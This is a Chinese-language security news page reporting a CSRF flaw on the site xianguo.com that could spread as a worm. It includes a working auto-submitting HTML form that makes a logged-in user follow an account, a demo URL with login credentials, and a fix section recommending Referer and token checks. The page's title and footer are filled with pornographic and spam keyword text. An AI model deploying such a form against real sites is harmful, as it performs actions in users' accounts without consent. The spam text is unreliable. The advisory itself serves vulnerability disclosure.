成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

鮮果網某處CSRF漏洞可蔓延蠕蟲

安全 漏洞
鮮果網某處CSRF漏洞,可能導致蠕蟲蔓延,在未經用戶同意的情況下發布文字、加關注等等!

鮮果網某處CSRF漏洞,可能導致蠕蟲蔓延,在未經用戶同意的情況下發布文字、加關注等等!

詳細說明:在接受POST和GET的信息的時候,未對POST來路(Referer)進行驗證,同時也沒有在POST的信息中加token驗證信息的正確性,導致漏洞產生。

演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用戶名/密碼:imlonghao)

登錄狀態下訪問,會自動發一條名為Hello World的微博,并會關注一個用戶。

漏洞地址:http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

鮮果網某處CSRF漏洞可蔓延蠕蟲

效果

[[97443]]

【發文字】

修復方案:

檢查POST來路Referer

在POST的信息中加token

責任編輯:藍雨淚 來源: 2cto
相關推薦

2011-08-31 14:38:40

2013-04-24 15:56:40

2015-02-10 13:24:27

CSRF漏洞CSRF

2010-07-20 10:26:50

2013-12-02 13:34:55

2014-07-17 15:47:52

2025-05-07 07:50:00

漏洞終端安全網絡攻擊

2009-11-09 19:59:47

2014-08-01 09:12:39

2014-12-30 14:02:54

2017-09-22 12:31:08

云計算容器容器蔓延

2019-09-17 10:06:46

數據庫程序員網絡安全

2011-05-10 09:55:14

2010-07-28 16:02:51

2014-06-12 13:44:19

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2015-03-10 18:07:53

2015-03-06 17:02:51

2020-07-16 11:51:37

漏洞WindowsDNS服務器

2021-12-23 16:35:54

Apache Log4
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 玖玖国产 | 国产精品欧美一区喷水 | 男女视频在线免费观看 | 久久久久无码国产精品一区 | 婷婷久久综合 | av一二三区 | 日韩在线成人 | 亚洲欧洲成人在线 | 久久久精品视频一区二区三区 | 日韩欧美在线播放 | 在线一区| 一区二区在线 | 日本三级做a全过程在线观看 | 91国产视频在线 | 亚洲一区二区三区四区在线观看 | 亚洲精品成人 | 国产精品亚洲第一 | 欧美一级片| www久久久 | 国产精品午夜电影 | 久久精品国产清自在天天线 | 91欧美激情一区二区三区成人 | 狠狠亚洲 | 中文字幕日韩一区 | 国产成人久久久 | 一级片免费视频 | 涩涩鲁亚洲精品一区二区 | 欧美日韩在线观看视频网站 | 日韩欧美精品在线 | 美女逼网站 | 中文字幕免费在线 | h片在线观看网站 | www国产成人免费观看视频 | 亚州综合在线 | 黄色在线免费观看视频网站 | 国产在线不卡 | 色婷婷激情综合 | 色综合九九 | 精品国产久 | av大全在线| 国产精品视频久久 |